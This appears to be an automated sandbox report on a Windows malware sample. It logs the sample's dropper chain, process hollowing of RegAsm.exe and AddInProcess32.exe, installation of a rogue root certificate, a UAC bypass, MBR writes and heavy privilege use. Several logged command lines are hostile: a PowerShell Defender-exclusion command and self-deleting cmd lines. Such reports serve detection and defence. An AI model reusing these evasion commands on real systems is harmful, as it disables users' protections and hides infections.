\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer Install.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{77c203ea-0000-0000-0000-d01200000000}\NukeOnDelete = "0" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe -
Processes:
fileosn.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 fileosn.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 fileosn.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exeexplortu.exe428002730b.exeaxplont.exeaxplont.exe7c602150df.exeexplortu.exeRegAsm.exesvhoost.exefileosn.exeOne.exepowershell.exe50GOjmdgQviYZtho8Vpb8ZVk.exeaVQ0bCqrBKF4mc5oy5N4ZcJW.exeaxplont.exeexplortu.exeAddInProcess32.exepowershell.exepowershell.exepowershell.exepid process 4736 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe 4736 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe 4744 explortu.exe 4744 explortu.exe 3596 428002730b.exe 3596 428002730b.exe 3160 axplont.exe 3160 axplont.exe 960 axplont.exe 960 axplont.exe 3416 7c602150df.exe 3416 7c602150df.exe 1736 explortu.exe 1736 explortu.exe 2536 RegAsm.exe 2536 RegAsm.exe 2592 svhoost.exe 2592 svhoost.exe 2028 fileosn.exe 2028 fileosn.exe 4856 One.exe 4856 One.exe 2836 powershell.exe 2836 powershell.exe 2836 powershell.exe 4188 50GOjmdgQviYZtho8Vpb8ZVk.exe 4188 50GOjmdgQviYZtho8Vpb8ZVk.exe 4188 50GOjmdgQviYZtho8Vpb8ZVk.exe 4188 50GOjmdgQviYZtho8Vpb8ZVk.exe 3660 aVQ0bCqrBKF4mc5oy5N4ZcJW.exe 3660 aVQ0bCqrBKF4mc5oy5N4ZcJW.exe 3660 aVQ0bCqrBKF4mc5oy5N4ZcJW.exe 3660 aVQ0bCqrBKF4mc5oy5N4ZcJW.exe 3660 aVQ0bCqrBKF4mc5oy5N4ZcJW.exe 2592 svhoost.exe 2592 svhoost.exe 2592 svhoost.exe 2592 svhoost.exe 4352 axplont.exe 4352 axplont.exe 2288 explortu.exe 2288 explortu.exe 3660 aVQ0bCqrBKF4mc5oy5N4ZcJW.exe 3660 aVQ0bCqrBKF4mc5oy5N4ZcJW.exe 960 AddInProcess32.exe 960 AddInProcess32.exe 3660 aVQ0bCqrBKF4mc5oy5N4ZcJW.exe 3660 aVQ0bCqrBKF4mc5oy5N4ZcJW.exe 960 AddInProcess32.exe 960 AddInProcess32.exe 960 AddInProcess32.exe 5480 powershell.exe 5480 powershell.exe 5480 powershell.exe 4488 powershell.exe 4488 powershell.exe 4488 powershell.exe 2028 fileosn.exe 2028 fileosn.exe 2028 fileosn.exe 2028 fileosn.exe 5544 powershell.exe 5544 powershell.exe 5544 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
One.exefile300un.exesvhoost.exefileosn.exeinstallutil.exepowershell.exeaVQ0bCqrBKF4mc5oy5N4ZcJW.exe50GOjmdgQviYZtho8Vpb8ZVk.exeAddInProcess32.exeRegAsm.exepowershell.exepowershell.exeWMIC.exepowershell.exepowershell.exepowershell.exepowershell.EXEInstallUtil.exedescription pid process Token: SeDebugPrivilege 4856 One.exe Token: SeBackupPrivilege 4856 One.exe Token: SeSecurityPrivilege 4856 One.exe Token: SeSecurityPrivilege 4856 One.exe Token: SeSecurityPrivilege 4856 One.exe Token: SeSecurityPrivilege 4856 One.exe Token: SeDebugPrivilege 904 file300un.exe Token: SeDebugPrivilege 2592 svhoost.exe Token: SeDebugPrivilege 2028 fileosn.exe Token: SeDebugPrivilege 1032 installutil.exe Token: SeDebugPrivilege 2836 powershell.exe Token: SeDebugPrivilege 3660 aVQ0bCqrBKF4mc5oy5N4ZcJW.exe Token: SeManageVolumePrivilege 4188 50GOjmdgQviYZtho8Vpb8ZVk.exe Token: SeDebugPrivilege 960 AddInProcess32.exe Token: SeDebugPrivilege 3744 RegAsm.exe Token: SeDebugPrivilege 5480 powershell.exe Token: SeDebugPrivilege 4488 powershell.exe Token: SeIncreaseQuotaPrivilege 4644 WMIC.exe Token: SeSecurityPrivilege 4644 WMIC.exe Token: SeTakeOwnershipPrivilege 4644 WMIC.exe Token: SeLoadDriverPrivilege 4644 WMIC.exe Token: SeSystemProfilePrivilege 4644 WMIC.exe Token: SeSystemtimePrivilege 4644 WMIC.exe Token: SeProfSingleProcessPrivilege 4644 WMIC.exe Token: SeIncBasePriorityPrivilege 4644 WMIC.exe Token: SeCreatePagefilePrivilege 4644 WMIC.exe Token: SeBackupPrivilege 4644 WMIC.exe Token: SeRestorePrivilege 4644 WMIC.exe Token: SeShutdownPrivilege 4644 WMIC.exe Token: SeDebugPrivilege 4644 WMIC.exe Token: SeSystemEnvironmentPrivilege 4644 WMIC.exe Token: SeRemoteShutdownPrivilege 4644 WMIC.exe Token: SeUndockPrivilege 4644 WMIC.exe Token: SeManageVolumePrivilege 4644 WMIC.exe Token: 33 4644 WMIC.exe Token: 34 4644 WMIC.exe Token: 35 4644 WMIC.exe Token: 36 4644 WMIC.exe Token: SeIncreaseQuotaPrivilege 4644 WMIC.exe Token: SeSecurityPrivilege 4644 WMIC.exe Token: SeTakeOwnershipPrivilege 4644 WMIC.exe Token: SeLoadDriverPrivilege 4644 WMIC.exe Token: SeSystemProfilePrivilege 4644 WMIC.exe Token: SeSystemtimePrivilege 4644 WMIC.exe Token: SeProfSingleProcessPrivilege 4644 WMIC.exe Token: SeIncBasePriorityPrivilege 4644 WMIC.exe Token: SeCreatePagefilePrivilege 4644 WMIC.exe Token: SeBackupPrivilege 4644 WMIC.exe Token: SeRestorePrivilege 4644 WMIC.exe Token: SeShutdownPrivilege 4644 WMIC.exe Token: SeDebugPrivilege 4644 WMIC.exe Token: SeSystemEnvironmentPrivilege 4644 WMIC.exe Token: SeRemoteShutdownPrivilege 4644 WMIC.exe Token: SeUndockPrivilege 4644 WMIC.exe Token: SeManageVolumePrivilege 4644 WMIC.exe Token: 33 4644 WMIC.exe Token: 34 4644 WMIC.exe Token: 35 4644 WMIC.exe Token: 36 4644 WMIC.exe Token: SeDebugPrivilege 5544 powershell.exe Token: SeDebugPrivilege 2288 powershell.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeDebugPrivilege 1164 powershell.EXE Token: SeDebugPrivilege 5676 InstallUtil.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe7GB8EE4ovuV7PRbpqsq3NaNR.exepid process 4736 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe 4996 7GB8EE4ovuV7PRbpqsq3NaNR.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
7GB8EE4ovuV7PRbpqsq3NaNR.exepid process 4996 7GB8EE4ovuV7PRbpqsq3NaNR.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exeexplortu.exe428002730b.exeaxplont.exe33333.exeRegAsm.exelumma1234.exegold.exedescription pid process target process PID 4736 wrote to memory of 4744 4736 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe explortu.exe PID 4736 wrote to memory of 4744 4736 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe explortu.exe PID 4736 wrote to memory of 4744 4736 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe explortu.exe PID 4744 wrote to memory of 2184 4744 explortu.exe explortu.exe PID 4744 wrote to memory of 2184 4744 explortu.exe explortu.exe PID 4744 wrote to memory of 2184 4744 explortu.exe explortu.exe PID 4744 wrote to memory of 3596 4744 explortu.exe 428002730b.exe PID 4744 wrote to memory of 3596 4744 explortu.exe 428002730b.exe PID 4744 wrote to memory of 3596 4744 explortu.exe 428002730b.exe PID 3596 wrote to memory of 3160 3596 428002730b.exe axplont.exe PID 3596 wrote to memory of 3160 3596 428002730b.exe axplont.exe PID 3596 wrote to memory of 3160 3596 428002730b.exe axplont.exe PID 4744 wrote to memory of 3416 4744 explortu.exe 7c602150df.exe PID 4744 wrote to memory of 3416 4744 explortu.exe 7c602150df.exe PID 4744 wrote to memory of 3416 4744 explortu.exe 7c602150df.exe PID 3160 wrote to memory of 2364 3160 axplont.exe 33333.exe PID 3160 wrote to memory of 2364 3160 axplont.exe 33333.exe PID 3160 wrote to memory of 2364 3160 axplont.exe 33333.exe PID 2364 wrote to memory of 1408 2364 33333.exe RegAsm.exe PID 2364 wrote to memory of 1408 2364 33333.exe RegAsm.exe PID 2364 wrote to memory of 1408 2364 33333.exe RegAsm.exe PID 2364 wrote to memory of 3744 2364 33333.exe RegAsm.exe PID 2364 wrote to memory of 3744 2364 33333.exe RegAsm.exe PID 2364 wrote to memory of 3744 2364 33333.exe RegAsm.exe PID 2364 wrote to memory of 3744 2364 33333.exe RegAsm.exe PID 2364 wrote to memory of 3744 2364 33333.exe RegAsm.exe PID 2364 wrote to memory of 3744 2364 33333.exe RegAsm.exe PID 2364 wrote to memory of 3744 2364 33333.exe RegAsm.exe PID 2364 wrote to memory of 3744 2364 33333.exe RegAsm.exe PID 3160 wrote to memory of 2028 3160 axplont.exe fileosn.exe PID 3160 wrote to memory of 2028 3160 axplont.exe fileosn.exe PID 3160 wrote to memory of 2028 3160 axplont.exe fileosn.exe PID 3744 wrote to memory of 2592 3744 RegAsm.exe svhoost.exe PID 3744 wrote to memory of 2592 3744 RegAsm.exe svhoost.exe PID 3744 wrote to memory of 2592 3744 RegAsm.exe svhoost.exe PID 3744 wrote to memory of 4856 3744 RegAsm.exe One.exe PID 3744 wrote to memory of 4856 3744 RegAsm.exe One.exe PID 3160 wrote to memory of 2328 3160 axplont.exe lumma1234.exe PID 3160 wrote to memory of 2328 3160 axplont.exe lumma1234.exe PID 3160 wrote to memory of 2328 3160 axplont.exe lumma1234.exe PID 2328 wrote to memory of 816 2328 lumma1234.exe RegAsm.exe PID 2328 wrote to memory of 816 2328 lumma1234.exe RegAsm.exe PID 2328 wrote to memory of 816 2328 lumma1234.exe RegAsm.exe PID 2328 wrote to memory of 4168 2328 lumma1234.exe RegAsm.exe PID 2328 wrote to memory of 4168 2328 lumma1234.exe RegAsm.exe PID 2328 wrote to memory of 4168 2328 lumma1234.exe RegAsm.exe PID 2328 wrote to memory of 4168 2328 lumma1234.exe RegAsm.exe PID 2328 wrote to memory of 4168 2328 lumma1234.exe RegAsm.exe PID 2328 wrote to memory of 4168 2328 lumma1234.exe RegAsm.exe PID 2328 wrote to memory of 4168 2328 lumma1234.exe RegAsm.exe PID 2328 wrote to memory of 4168 2328 lumma1234.exe RegAsm.exe PID 2328 wrote to memory of 4168 2328 lumma1234.exe RegAsm.exe PID 3160 wrote to memory of 4936 3160 axplont.exe gold.exe PID 3160 wrote to memory of 4936 3160 axplont.exe gold.exe PID 3160 wrote to memory of 4936 3160 axplont.exe gold.exe PID 4936 wrote to memory of 764 4936 gold.exe RegAsm.exe PID 4936 wrote to memory of 764 4936 gold.exe RegAsm.exe PID 4936 wrote to memory of 764 4936 gold.exe RegAsm.exe PID 4936 wrote to memory of 764 4936 gold.exe RegAsm.exe PID 4936 wrote to memory of 764 4936 gold.exe RegAsm.exe PID 4936 wrote to memory of 764 4936 gold.exe RegAsm.exe PID 4936 wrote to memory of 764 4936 gold.exe RegAsm.exe PID 4936 wrote to memory of 764 4936 gold.exe RegAsm.exe PID 4936 wrote to memory of 764 4936 gold.exe RegAsm.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
file300un.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe"C:\Users\Admin\AppData\Local\Temp\6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"3⤵
-
C:\Users\Admin\1000004002\428002730b.exe"C:\Users\Admin\1000004002\428002730b.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"7⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 38⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2364 -s 3046⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 2926⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"5⤵
- UAC bypass
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe" -Force6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"6⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\aVQ0bCqrBKF4mc5oy5N4ZcJW.exe"C:\Users\Admin\Pictures\aVQ0bCqrBKF4mc5oy5N4ZcJW.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"8⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"8⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"9⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"9⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"8⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"8⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"8⤵
- Checks SCSI registry key(s)
-
C:\Users\Admin\Pictures\50GOjmdgQviYZtho8Vpb8ZVk.exe"C:\Users\Admin\Pictures\50GOjmdgQviYZtho8Vpb8ZVk.exe" /s7⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\7GB8EE4ovuV7PRbpqsq3NaNR.exe"C:\Users\Admin\Pictures\7GB8EE4ovuV7PRbpqsq3NaNR.exe"7⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\Pictures\PPSVNmeA5Lq8uO8faTZH5Y7p.exe"C:\Users\Admin\Pictures\PPSVNmeA5Lq8uO8faTZH5Y7p.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSF121.tmp\Install.exe.\Install.exe8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSF3B2.tmp\Install.exe.\Install.exe /NQHxdidUQs "385118" /S9⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
-
